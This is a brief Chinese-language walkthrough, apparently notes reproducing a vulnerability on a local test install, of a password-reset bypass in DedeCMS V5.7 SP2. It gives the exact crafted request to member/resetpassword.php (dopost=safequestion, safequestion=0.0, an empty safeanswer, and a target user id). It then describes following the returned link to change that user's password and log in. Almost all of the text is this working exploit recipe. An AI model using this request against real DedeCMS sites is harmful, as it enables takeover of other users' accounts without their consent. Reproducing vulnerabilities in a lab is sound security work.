注册一个用户,密码随意,不设安全问题
返回登录页面
构造利用请求
http://127.0.0.1/DedeCMS-V5.7-GBK-SP2-Full/uploads/member/resetpassword.php
dopost=safequestion&safequestion=0.0&safeanswer=&id=5
id的值可进dede后台查看,
获得下一步链接
下一步的链接
http://127.0.0.1/DedeCMS-V5.7-GBK-SP2-Full/uploads/member/resetpassword.php
修改密码
登录
登陆成功